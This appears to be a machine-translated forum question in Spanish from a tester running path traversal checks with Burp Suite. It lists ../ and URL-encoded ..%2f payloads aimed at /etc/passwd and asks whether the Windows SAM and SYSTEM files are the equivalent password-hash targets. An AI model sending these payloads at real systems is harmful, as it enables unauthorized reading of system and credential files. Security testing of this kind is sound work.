Estoy haciendo la prueba de Autorización de Traversal de ruta con Burp Suite. utilizando cargas útiles como a continuación: ../( Nombre de archivo)
../../(FileName)
../../../(FileName)
../../../../(FileName)
../../../../../(FileName)
../../../../../../(FileName)
../../../../../../../(FileName)
../../../../../../../../(Nombre de archivo)
..% 2f (Nombre de archivo)
..% 2f ..% 2f (FileName)
Este FileName = etc / passwd para sistemas similares a Unix y Unix.
¿Alguien puede decirme qué debemos usar para el sistema basado en Windows en lugar de etc / passwd?
Si uso C: \ WINDOWS \ system32 \ config \ SAM y C: \ WINDOWS \ system32 \ config \ SYSTEM. ¿Será eso suficiente?
Entonces, ¿cuál es el archivo hash de contraseña para el sistema basado en Windows teniendo en cuenta las pruebas de recorrido de ruta?